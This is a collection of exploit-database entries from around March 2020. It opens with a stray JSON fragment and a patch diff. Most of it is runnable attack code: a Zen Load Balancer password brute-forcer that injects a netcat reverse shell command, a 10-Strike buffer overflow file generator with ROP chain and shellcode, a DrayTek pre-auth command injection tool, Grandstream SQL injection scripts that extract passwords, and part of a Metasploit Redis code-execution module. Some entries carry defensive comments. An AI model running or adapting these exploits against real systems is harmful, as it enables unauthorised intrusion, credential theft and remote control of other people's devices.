10-34-23.png","text":"Screenshot from 2019-04-08 10-34-23.png","disable":false},{"value":"Screenshot from 2019-04-13 08-23-48.png","text":"Screenshot from 2019-04-13 08-23-48.png","disable":false},{"value":"Screenshot from 2019-05-24 23-14-05.png","text":"Screenshot from 2019-05-24 23-14-05.png","disable":false},{"value":"b.jpg","text":"b.jpg","disable":false},{"value":"by_gh0uli.tumblr.com-8755.png.jpeg","text":"by_gh0uli.tumblr.com-8755.png.jpeg","disable":false},{"value":"max_payne_06.jpg","text":"max_payne_06.jpg","disable":false},{"value":"xxx.jpg","text":"xxx.jpg","disable":false}] ...snip... ################################################################## #Q&D Patch (DO NOT USE :3) ################################################################## --- ./image.php --- +++ image_patched.php --- @@ -394,7 +394,7 @@ public function onAjax_files() { $this->loadMeForAjax(); - $folder = $this->app->input->get('folder', '', 'string'); + $folder = $this->app->input->get('folder', '', 'cmd'); if (!strstr($folder, JPATH_SITE)) {
-
Zen Load Balancer 3.10.1 - Remote Code Execution
# Exploit Title: Zen Load Balancer 3.10.1 - Remote Code Execution
# Google Dork: no
# Date: 2020-03-28
# Exploit Author: Cody Sixteen
# Vendor Homepage: https://code610.blogspot.com
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
# Version: 3.10.1
# Tested on: Linux
# CVE : CVE-2019-7301

#c@kali:~/src/eonila/zenload3r$ cat zenload3r.py
#!/usr/bin/env python
# zenload3r.py - zen load balancer pwn3r
# 28.03.2020 @ 22:41
#
# by cody sixteen
#

# Overview (Python 2: print statements, str-based base64):
#   main()    -> checks that <target>:444/index.cgi answers 401 (HTTP Basic)
#   logmein() -> tries every line of passwd.lst as the 'admin' password
#   load3r()  -> POSTs the "Generate CSR" form with a shell command in the
#                cert_organization field
# Defensive reading: the injected value lands in a certificate-request form
# field; presumably the CSR handler passes it to a shell command — confirm
# against CVE-2019-7301. Mitigations: validate CSR subject fields against
# a strict character set and never build the command through a shell;
# rate-limit or lock out repeated Basic-auth failures on index.cgi, which
# is the noisy part of this script and the easiest to detect in web logs.

import base64
import sys, re
import requests
import ssl
from functools import partial
# Forces TLSv1 for every wrapped socket (global monkeypatch).
ssl.wrap_socket = partial(ssl.wrap_socket, ssl_version=ssl.PROTOCOL_TLSv1)

# disable ssl warnings:
import urllib3
urllib3.disable_warnings()

from requests.auth import HTTPBasicAuth
#
# No argument check: running without a target raises IndexError.
target = sys.argv[1]
username = 'admin'
# Default password shown in the banner; the actual candidates come from
# the wordlist read in logmein().
password = 'P@ssw0rd'

def main():
    """Probe <target>:444/index.cgi and, on a 401, start the login loop.

    Sets the module globals `sess` (a requests session) and `baseUrl`.
    Any other status code ends the script silently.
    """
    print 'zenload3r.py - zen load balancer pwn3r'
    print ' zenload3r.py - vs - %s' % ( target )
    print ''
    print '[+] checking if host is alive...'
    global sess
    sess = requests.session()
    global baseUrl
    baseUrl = target + ':444/index.cgi'
    # verify=False: certificate validation disabled.
    checkBaseUrl = sess.get(baseUrl, verify=False)
    checkBaseResp = checkBaseUrl.status_code
    #print checkBaseResp
    if checkBaseResp == 401:
        print '[i] ...it is. we need to log in to proceed'
        logmein(baseUrl)

def logmein(target):
    """Try each password in passwd.lst against HTTP Basic auth as 'admin'.

    `target` is unused: the global `baseUrl` set in main() is what gets
    requested. A hit is detected by the literal '<p>Hello <strong>admin'
    fragment in the response, after which load3r() is called; the loop
    does not break, so later candidates are still tried.
    The wordlist handle is never closed.
    """
    print '[+] trying %s and default password "%s" vs %s' % (username, password, baseUrl)
    #pwd_file = '/usr/share/wordlists/dirb/common.txt'
    pwd_file = 'passwd.lst'
    try:
        read_pwds = open(pwd_file, 'r')
        pwds = read_pwds.readlines()
        for pwd in pwds:
            pwd = pwd.rstrip()
            logme = sess.post(baseUrl, auth=HTTPBasicAuth(username,pwd), allow_redirects=True)
            logmeresp = logme.text
            #print logmeresp
            if '<p>Hello <strong>admin</strong>' in logmeresp:
                print '[+] admin user logged-in! :D'
                print '[+] working password: %s' % ( pwd )
                load3r(baseUrl, pwd)
    except requests.exceptions.ConnectionError:
        print '[-] Can not connect to remote host :C\n'

def load3r(baseUrl, pwd):
    """POST the 'Generate CSR' form with a command in cert_organization.

    NOTE: the `baseUrl` parameter is overwritten with a hard-coded
    https://192.168.1.200:444 URL, and the command in `sh` points at a
    hard-coded 192.168.1.170:4444, so this function ignores the script's
    target argument entirely. The response is not inspected.
    """
    print '[+] time to get reverse shell, preparing...'
    creds = base64.b64encode("{}:{}".format(username,pwd))
    creds2 = creds.rstrip()
    print 'creds: ', creds2
    baseUrl = "https://192.168.1.200:444/index.cgi"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
               "Accept-Language": "pl,en-US;q=0.7,en;q=0.3",
               "Accept-Encoding": "gzip, deflate",
               "Content-Type": "application/x-www-form-urlencoded",
               "Origin": "https://192.168.1.200:444",
               "Authorization": "Basic {}".format(creds2),
               "Connection": "close",
               "Referer": "https://192.168.1.200:444/index.cgi?id=1-3&action=Show_Form",
               "Upgrade-Insecure-Requests": "1"
               }
    sh = "a\";nc 192.168.1.170 4444 -e /bin/sh;#"
    reqdata = {"cert_name": "qweqweqwe", "cert_issuer": "Sofintel", "cert_fqdn": "qweqweqwe", "cert_division": "qweqweqwe", "cert_organization": sh, "cert_locality": "qweqweqwe", "cert_state": "qweqweqwe", "cert_country": "qw", "cert_mail": "[email protected]", "cert_key": "2048", "id": "1-3", "actionpost": "Generate CSR", "button": "Generate CSR"}
    requests.post(baseUrl, headers=headers, data=reqdata,verify=False)
    print '[*] got r00t? ;>\n'

# run me:
if __name__ == '__main__':
    main()
-
10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH) (ROP)
# Exploit Title: 10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP) # Date: 2020-03-30 # Exploit Author: Hodorsec # Version: 9.03 # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe # Vendor Homepage: https://www.10-strike.com # Tested on: Win8.1 x64 - Build 9600 # Description: # - Exploits the functionality to load a list of computers from a file # - Some DLL's and the main EXE don't rebase, which allowed for some instruction reusage for ROP # - Used a jump after ROP to go to a buffer for more space # Reproduction: # - Run the script, a TXT file will be generated # - Open the program and click on tab "Computers" # - Click the button "From Text File" and select the generated TXT file # - Clck OK and check results # WinDBG initial crash output: # (f54.f48): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\10-Strike Network Inventory Explorer\NetworkInventoryExplorer.exe # eax=000013d3 ebx=0018f778 ecx=000002e4 edx=0018f7c0 esi=08fd8d8c edi=00190000 # eip=00402b47 esp=0018f6e4 ebp=0018f73c iopl=0 nv up ei pl nz na po cy # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210203 # NetworkInventoryExplorer+0x2b47: # 00402b47 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] # 0:000> g # (f54.f48): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=0018f700 ebx=00420244 ecx=00000002 edx=08fd854c esi=0048b11c edi=08f4f388 # eip=41414141 esp=0018f8dc ebp=41414141 iopl=0 nv up ei pl nz na po nc # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202 # 41414141 ?? ??? 
#!/usr/bin/python
# Proof-of-concept file generator for the "From Text File" import. Builds a
# 5000-byte file laid out as: filler up to the SEH record, the overwritten
# NSEH/SEH words, then the encoded payload, a RET "landing pad", a ROP chain
# and a short backwards jump. Only the file is produced here; the crash is
# reached by loading the file through the GUI as described above.
# Defensive reading: every ROP address and the SEH handler below are fixed
# because (per the description above) MSVCR71.dll, sqlite3.dll and the main
# EXE are not rebased. Shipping those modules with /DYNAMICBASE and /SAFESEH
# invalidates the whole chain; the root fix is bounding the import copy
# (the rep movs at NetworkInventoryExplorer+0x2b47 in the crash dump).
# NOTE(review): `shellcode` is bytes while prenop/retnop/prefix are str, so
# this runs only on Python 2 (Python 3 raises TypeError on concatenation).
import sys, struct

filename = "poc_10_strike_nie.txt"

# Maximum length
maxlen = 5000

# Offsets
crash_esi = 2145 # Initial space until ESI buffer filling
# NOTE: crash_esi is not used anywhere below.
crash_seh = 217 # SEH
crash_nseh = crash_seh - 4 # NSEH
landingpad = 310 # Space for RET NOP landingpad after stackpivoting

# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -v shellcode -f python -b "\x0a\x0d\x00\x5c\x3a" exitfunc=thread
# Payload size: 220 bytes
shellcode = b""
shellcode += b"\xda\xdb\xd9\x74\x24\xf4\x5f\x2b\xc9\xbd\x06"
shellcode += b"\xa7\x5d\x4b\xb1\x31\x83\xef\xfc\x31\x6f\x14"
shellcode += b"\x03\x6f\x12\x45\xa8\xb7\xf2\x0b\x53\x48\x02"
shellcode += b"\x6c\xdd\xad\x33\xac\xb9\xa6\x63\x1c\xc9\xeb"
shellcode += b"\x8f\xd7\x9f\x1f\x04\x95\x37\x2f\xad\x10\x6e"
shellcode += b"\x1e\x2e\x08\x52\x01\xac\x53\x87\xe1\x8d\x9b"
shellcode += b"\xda\xe0\xca\xc6\x17\xb0\x83\x8d\x8a\x25\xa0"
shellcode += b"\xd8\x16\xcd\xfa\xcd\x1e\x32\x4a\xef\x0f\xe5"
shellcode += b"\xc1\xb6\x8f\x07\x06\xc3\x99\x1f\x4b\xee\x50"
shellcode += b"\xab\xbf\x84\x62\x7d\x8e\x65\xc8\x40\x3f\x94"
shellcode += b"\x10\x84\x87\x47\x67\xfc\xf4\xfa\x70\x3b\x87"
shellcode += b"\x20\xf4\xd8\x2f\xa2\xae\x04\xce\x67\x28\xce"
shellcode += b"\xdc\xcc\x3e\x88\xc0\xd3\x93\xa2\xfc\x58\x12"
shellcode += b"\x65\x75\x1a\x31\xa1\xde\xf8\x58\xf0\xba\xaf"
shellcode += b"\x65\xe2\x65\x0f\xc0\x68\x8b\x44\x79\x33\xc1"
shellcode += b"\x9b\x0f\x49\xa7\x9c\x0f\x52\x97\xf4\x3e\xd9"
shellcode += b"\x78\x82\xbe\x08\x3d\x6c\x5d\x99\x4b\x05\xf8"
shellcode += b"\x48\xf6\x48\xfb\xa6\x34\x75\x78\x43\xc4\x82"
shellcode += b"\x60\x26\xc1\xcf\x26\xda\xbb\x40\xc3\xdc\x68"
shellcode += b"\x60\xc6\xbe\xef\xf2\x8a\x6e\x8a\x72\x28\x6f"

# ROP chain
def create_rop_chain():
    """Return the gadget addresses below packed as consecutive little-endian
    32-bit words (one struct.pack('<I') per entry, joined into a str)."""
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x7c344efe, # POP EDX # RETN [MSVCR71.dll]
        0x61e9b30c, # ptr to &VirtualProtect() [IAT sqlite3.dll]
        0x010283e5, # MOV EAX,DWORD PTR DS:[EDX] # RETN [NetworkInventoryExplorer.exe]
        0x010296a1, # XCHG EAX,ESI # ADD AL,BYTE PTR DS:[ECX] # RETN [NetworkInventoryExplorer.exe]
        0x61e7555f, # POP EBP # RETN [sqlite3.dll]
        0x61e63eaf, # & push esp # ret 0x04 [sqlite3.dll]
        0x7c37678f, # POP EAX # RETN [MSVCR71.dll]
        0xfffffdff, # Value to negate, will become 0x00000201
        0x7c34d749, # NEG EAX # RETN [MSVCR71.dll]
        0x0102a8a0, # POP EBX # RETN [NetworkInventoryExplorer.exe]
        0xffffffff, #
        0x61e0579d, # INC EBX # RETN [sqlite3.dll]
        0x0102104a, # ADD EBX,EAX # RETN [NetworkInventoryExplorer.exe]
        0x7c3458e6, # POP EDX # RETN [MSVCR71.dll]
        0xffffffc0, # Value to negate, will become 0x00000040
        0x7c351eb1, # NEG EDX # RETN [MSVCR71.dll]
        0x7c369c4a, # POP ECX # RETN [MSVCR71.dll]
        0x7c38dfd7, # &Writable location [MSVCR71.dll]
        0x7c34a40e, # POP EDI # RETN [MSVCR71.dll]
        0x0101da30, # RETN (ROP NOP) [NetworkInventoryExplorer.exe]
        0x01014218, # POP EAX # RETN [NetworkInventoryExplorer.exe]
        0x90909090, # nop
        0x01014244, # PUSHAD # RETN [NetworkInventoryExplorer.exe]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

# NOPPING
retnop = struct.pack("<L", 0x61e0103e) # RET # sqlite3.dll
prenop = "\x90" * 200 # Pre NOP's after jumping back in stack, sledding until shellcode
postnop = "\x90" * 16 # Post NOP's after running ROP chain to disable DEP

# Jump back on stack for payload space
jmpback = "\xe9\x9f\xf9\xff\xff" # jmp 0xfffff9a4 # Jump back on stack for more space

# Prefix
prefix = "A" * crash_nseh # Junk until NSEH
nseh = "B" * 4 # Junk again, no use for NSEH
seh = struct.pack("<L", 0x0101ce0b) # ADD ESP,0BDC # RETN 0x0C ** [NetworkInventoryExplorer.exe] ** # Stackpivot

suffix = prenop # Prenopping until shellcode
suffix += shellcode # Magic!
suffix += retnop * landingpad # RET NOP as a landingpad after stackpivot, still having DEP enabled
suffix += rop_chain # Disable DEP
suffix += postnop # Old school NOP-sledding
suffix += jmpback # Jump! Just like van Halen
# Pad to exactly maxlen bytes; negative counts would silently yield "".
suffix += "C" * (maxlen - len(prefix + nseh + seh + suffix)) # Junk for filling

# Concatenate string for payload
payload = prefix + nseh + seh + suffix

# Put it all together
# NOTE: `file` shadows the Python 2 builtin; the bare except hides the
# actual error (including KeyboardInterrupt) behind a generic message.
try:
    file = open(filename,"wb")
    file.write(payload)
    file.close()
    print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
except:
    print "[!] Error creating file!"
    sys.exit(0)
-
Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation
# CVE-2020-0796 Windows SMBv3 LPE Exploit

## Authors

* Daniel García Gutiérrez ([@danigargu](https://twitter.com/danigargu))
* Manuel Blanco Parajón ([@dialluvioso_](https://twitter.com/dialluvioso_))

## References

* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
* https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html
* https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server.html#.Xndfn0lv150.twitter
* https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796/
* http://blogs.360.cn/post/CVE-2020-0796.html
* https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/

Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48267.zip
-
Multiple DrayTek Products - Pre-authentication Remote Root Code Execution
package main /* CVE-2020-8515: DrayTek pre-auth remote root RCE Mon Mar 30 2020 - 0xsha.io Affected: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta You should upgrade as soon as possible to 1.5.1 firmware or later This issue has been fixed in Vigor3900/2960/300B v1.5.1. read more : https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/ https://thehackernews.com/2020/03/draytek-network-hacking.html https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ exploiting using keyPath POST /cgi-bin/mainfunction.cgi HTTP/1.1 Host: 1.2.3.4 Content-Length: 89 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a */ import ( "fmt" "io/ioutil" "net/http" "net/url" "os" "strings" ) func usage() { fmt.Println("CVE-2020-8515 exploit by @0xsha ") fmt.Println("Usage : " + os.Args[0] + " URL " + "command" ) fmt.Println("E.G : " + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\"" ) } func main() { if len(os.Args) < 3 { usage() os.Exit(-1) } targetUrl := os.Args[1] //cmd := "cat /etc/passwd" cmd := os.Args[2] // payload preparation vulnerableFile := "/cgi-bin/mainfunction.cgi" // specially crafted CMD // action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a payload :=`' /bin/sh -c 'CMD' '` payload = strings.ReplaceAll(payload,"CMD", cmd) bypass := strings.ReplaceAll(payload," ", "${IFS}") //PostForm call url encoder internally resp, err := http.PostForm(targetUrl+vulnerableFile , url.Values{"action": {"login"}, "keyPath": {bypass} , "loginUser": {"a"}, "loginPwd": {"a"} }) if err != nil{ fmt.Println("error connecting host") os.Exit(-1) } defer resp.Body.Close() body, err := 
ioutil.ReadAll(resp.Body) if err != nil{ fmt.Println("error reading data") os.Exit(-1) } fmt.Println(string(body)) }
-
FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)
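# Exploit Title: FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)
# Vendor Homepage: https://www.flashfxp.com/
# Software Link Download: https://www.filehorse.com/download-flashfxp/22451/download/
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-03-30
# Vulnerable Software: FlashFXP
# Version: 4.2.0 Build 1730
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on: Windows 10 Pro (64 bit)
# Steps to Reproduce the Crash:
# 1.- Run python code: FlashCrash.py
# 2.- Copy content to clipboard
# 3.- Open "FlashFXP.exe"
# 4.- Go to "Options" > Filters > Skip List > New Entry
# 5.- Paste ClipBoard into the "Mask" field
# 6.- Click on OK
# 7.- Go to "Options" > Filters > Skip List
# 8.- Crashed
#################################################################################################################################################
# Python "FlashCrash.py" Code:

# 300 copies of "A" (0x41): the PoC only needs an over-long "Mask" value,
# the byte content itself is not significant.
buffer = "\x41" * 300

# A context manager closes the handle even if write() raises, so a partial
# file is never left open behind an unhandled exception.
with open("FlashCrash.txt", "w") as f:
    f.write(buffer)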
-
Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection
# Exploit Title: Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection # Date: 2020-03-30 # Exploit Author: Jacob Baines # Vendor Homepage: http://www.grandstream.com/ # Software Link: http://www.grandstream.com/support/firmware/ucm62xx-official-firmware # Version: 1.0.20.20 and below # Tested on: Grandstream UCM6202 1.0.20.20 # CVE : CVE-2020-5726 # Grandstream UCM6200 Series CTI Interface SQL Injection Password Disclosure # Advisory: https://www.tenable.com/security/research/tra-2020-17 # Sample output: # # albinolobster@ubuntu:~$ python3 cti_injection.py --rhost 192.168.2.1 --user lolwat # [+] Reaching out to 192.168.2.1:8888 # [+] Password length 9 # [+] The password is LabPass1% import sys import time import json import struct import socket import argparse def send_cti_with_length(sock, payload): to_send = struct.pack('>I', len(payload)) to_send = to_send + payload sock.sendall(to_send) return recv_cti_with_length(sock) def recv_cti_with_length(sock): length = sock.recv(4) length = struct.unpack('>I', length)[0] response = sock.recv(length) return response top_parser = argparse.ArgumentParser(description='') top_parser.add_argument('--rhost', action="store", dest="rhost", required=True, help="The remote host to connect to") top_parser.add_argument('--rport', action="store", dest="rport", type=int, help="The remote port to connect to", default=8888) top_parser.add_argument('--user', action="store", dest="user", required=True, help="The user to brute force") args = top_parser.parse_args() print('[+] Reaching out to ' + args.rhost + ':' + str(args.rport)) length = 0 while length < 100: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((args.rhost, args.rport)) challenge_resp = send_cti_with_length(sock, b"action=challenge&user=" + args.user.encode('utf-8') + b"' AND LENGTH(user_password)=" + str(length).encode('utf-8') + b"--") inject_result = json.loads(challenge_resp) if (inject_result['status'] == 0): break else: length = 
length + 1 sock.close() if length == 100: print('[-] Failed to discover the password length') sys.exit(1) print('[+] Password length', length) password = '' while len(password) < length: value = 0x20 while value < 0x80: if value == 0x22 or value == 0x5c: temp_pass = password + '\\' temp_pass = temp_pass + chr(value) else: temp_pass = password + chr(value) temp_pass_len = len(temp_pass) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((args.rhost, args.rport)) challenge_resp = send_cti_with_length(sock, b"action=challenge&user=" + args.user.encode('utf-8') + b"' AND user_password LIKE \'" + temp_pass.encode('utf-8') + b"%' AND substr(user_password,1," + str(temp_pass_len).encode('utf-8') + b") = '" + temp_pass.encode('utf-8') + b"'--") inject_result = json.loads(challenge_resp) sock.close() if (inject_result['status'] == 0): password = temp_pass break else: value = value + 1 continue if value == 0x80: print('oh no.') sys.exit(0) print('[+] The password is', password)
-
Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection
# Exploit Title: Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection # Date: 2020-03-30 # Exploit Author: Jacob Baines # Vendor Homepage: http://www.grandstream.com/ # Software Link: http://www.grandstream.com/support/firmware/ucm62xx-official-firmware # Version: 1.0.20.20 and below # Tested on: Grandstream UCM6202 1.0.20.20 # CVE : CVE-2020-5725 # Grandstream UCM6200 Series WebSocket 1.0.20.20 SQL Injection Password Disclosure via Login (time based) # Advisory: https://www.tenable.com/security/research/tra-2020-17 # Sample output: # # albinolobster@ubuntu:~$ python3 websockify_login_injection.py --rhost 192.168.2.1 --user lolwat # [+] Password length is 9 # [+] Discovering password... # LabPass1% # [+] Done! The password is LabPass1% import sys import ssl import time import asyncio import argparse import websockets async def password_guess(ip, port, username): # the path to exploit uri = 'wss://' + ip + ':' + str(8089) + '/websockify' # no ssl verification ssl_context = ssl.SSLContext() ssl_context.verify_mode = ssl.CERT_NONE ssl_context.check_hostname = False # determine the length of the password. The timeout is 10 seconds... probably # way too long but whatever. 
length = 0 while length < 100: async with websockets.connect(uri, ssl=ssl_context) as websocket: start = time.time() login = '{"type":"request","message":{"transactionid":"123456789zxa","action":"login","username":"' + username + '\' AND LENGTH(user_password)==' + str(length) + ' AND 88=LIKE(\'ABCDEFG\',UPPER(HEX(RANDOMBLOB(500000000/2)))) or \'1\'=\'2","token":"lolwat"}}' await websocket.send(login) response = await websocket.recv() if (time.time() - start) < 5: length = length + 1 continue else: break # if we hit max password length than we've done something wrong if (length == 100): print('[+] Couldn\'t determine the passwords length.') sys.exit(1) print('[+] Password length is', length) print('[+] Discovering password...') # Now that we know the password length, just guess each password byte until # we've reached the full length. Again timeout set to 10 seconds. password = '' while len(password) < length: value = 0x20 while value < 0x80: if value == 0x22 or value == 0x5c: temp_pass = password + '\\' temp_pass = temp_pass + chr(value) else: temp_pass = password + chr(value) temp_pass_len = len(temp_pass) start = time.time() async with websockets.connect(uri, ssl=ssl_context) as websocket: challenge = '{"type":"request","message":{"transactionid":"123456789zxa","action":"login","username":"' + username + '\' AND user_password LIKE \'' + temp_pass +'%\' AND substr(user_password,1,' + str(temp_pass_len) + ') = \'' + temp_pass + '\' AND 88=LIKE(\'ABCDEFG\',UPPER(HEX(RANDOMBLOB(500000000/2)))) or \'1\'=\'2","token":"lolwat"}}' await websocket.send(challenge) response = await websocket.recv() if (time.time() - start) < 5: value = value + 1 continue else: print('\r' + temp_pass, end='') password = temp_pass break if value == 0x80: print('') print('[-] Failed to determine the password.') sys.exit(1) print('') print('[+] Done! 
The password is', password) top_parser = argparse.ArgumentParser(description='') top_parser.add_argument('--rhost', action="store", dest="rhost", required=True, help="The remote host to connect to") top_parser.add_argument('--rport', action="store", dest="rport", type=int, help="The remote port to connect to", default=8089) top_parser.add_argument('--user', action="store", dest="user", required=True, help="The user to brute force") args = top_parser.parse_args() asyncio.get_event_loop().run_until_complete(password_guess(args.rhost, args.rport, args.user))
-
Redis - Replication Code Execution (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::TcpServer include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper include Msf::Auxiliary::Redis include Msf::Module::Deprecated moved_from "exploit/linux/redis/redis_unauth_exec" def initialize(info = {}) super(update_info(info, 'Name' => 'Redis Replication Code Execution', 'Description' => %q{ This module can be used to leverage the extension functionality added since Redis 4.0.0 to execute arbitrary code. To transmit the given extension it makes use of the feature of Redis which called replication between master and slave. }, 'License' => MSF_LICENSE, 'Author' => [ 'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module ], 'References' => [ [ 'URL', 'https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf'], [ 'URL', 'https://github.com/RedisLabs/RedisModulesSDK'] ], 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ ['Automatic', {} ], ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'SRVPORT' => '6379' }, 'Privileged' => false, 'DisclosureDate' => 'Nov 13 2018', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ SERVICE_RESOURCE_LOSS], 'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ] }, )) register_options( [ Opt::RPORT(6379), OptBool.new('CUSTOM', [true, 'Whether compile payload file during exploiting', true]) ] ) register_advanced_options( [ OptString.new('RedisModuleInit', [false, 'The command of module to load and unload. Random string as default.']), OptString.new('RedisModuleTrigger', [false, 'The command of module to trigger the given function. Random string as default.']), OptString.new('RedisModuleName', [false, 'The name of module to load at first. 
Random string as default.']) ] ) deregister_options('URIPATH', 'THREADS', 'SSLCert') end # # Now tested on redis 4.x and 5.x # def check connect # they are only vulnerable if we can run the CONFIG command, so try that return Exploit::CheckCode::Safe unless (config_data = redis_command('CONFIG', 'GET', '*')) && config_data =~ /dbfilename/ if (info_data = redis_command('INFO')) && /redis_version:(?<redis_version>\S+)/ =~ info_data report_redis(redis_version) end unless redis_version print_error('Cannot retrieve redis version, please check it manually') return Exploit::CheckCode::Unknown end # Only vulnerable to version 4.x or 5.x version = Gem::Version.new(redis_version) if version >= Gem::Version.new('4.0.0') vprint_status("Redis version is #{redis_version}") return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe ensure disconnect end def has_check? true # Overrides the override in Msf::Auxiliary::Scanner imported by Msf::Auxiliary::Redis end def exploit if check_custom @module_init_name = datastore['RedisModuleInit'] || Rex::Text.rand_text_alpha_lower(4..8) @module_cmd = datastore['RedisModuleTrigger'] || "#{@module_init_name}.#{Rex::Text.rand_text_alpha_lower(4..8)}" else @module_init_name = 'shell' @module_cmd = 'shell.exec' end if srvhost == '0.0.0.0' fail_with(Failure::BadConfig, 'Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.') end # # Prepare for payload. # # 1. Use custcomed payload, it would compile a brand new file during running, which is more undetectable. # It's only worked on linux system. # # 2. Use compiled payload, it's avaiable on all OS, however more detectable. # if check_custom buf = create_payload generate_code_file(buf) compile_payload end connect # # Send the payload. # redis_command('SLAVEOF', srvhost, srvport.to_s) redis_command('CONFIG', 'SET', 'dbfilename', "#{module_file}") ::IO.select(nil, nil, nil, 2.0) # start the rogue server start_rogue_server # waiting for victim to receive the payload. 
Rex.sleep(1) redis_command('MODULE', 'LOAD', "./#{module_file}") redis_command('SLAVEOF', 'NO', 'ONE') # Trigger it. print_status('Sending command to trigger payload.') pull_the_trigger # Clean up Rex.sleep(2) register_file_for_cleanup("./#{module_file}") #redis_command('CONFIG', 'SET', 'dbfilename', 'dump.rdb') #redis_command('MODULE', 'UNLOAD', "#{@module_init_name}") ensure disconnect end # # We pretend to be a real redis server, and then slave the victim. # def start_rogue_server begin socket = Rex::Socket::TcpServer.create({'LocalHost'=>srvhost,'LocalPort'=>srvport}) print_status("Listening on #{srvhost}:#{srvport}") rescue Rex::BindFailed print_warning("Handler failed to bind to #{srvhost}:#{srvport}") print_status("Listening on 0.0.0.0:#{srvport}") socket = Rex::Socket::TcpServer.create({'LocalHost'=>'0.0.0.0', 'LocalPort'=>srvport}) end rsock = socket.accept() vprint_status('Accepted a connection') # Start negotiation while true request = rsock.read(1024) vprint_status("in<<< #{request.inspect}") response = "" finish = false case when request.include?('PING') response = "+PONG\r\n" when request.include?('REPLCONF') response = "+OK\r\n" when request.include?('PSYNC') || request.include?('SYNC') response = "+FULLRESYNC #{'Z'*40} 1\r\n" response << "$#{payload_bin.length}\r\n" response << "#{payload_bin}\r\n" finish = true end if response.length < 200 vprint_status("out>>> #{response.inspect}") else vprint_status("out>>> #{response.inspect[0..100]}......#{response.inspect[-100..-1]}") end rsock.put(response) if finish print_status('Rogue server close...') rsock.close() socket.close() break end end end def pull_the_trigger if check_custom redis_command("#{@module_cmd}") else execute_cmdstager end end # # Parpare command stager for the pre-compiled payload. # And the command of module is hard-coded. # def execute_command(cmd, opts = {}) redis_command('shell.exec',"#{cmd.to_s}") rescue nil end # # Generate source code file of payload to be compiled dynamicly. 
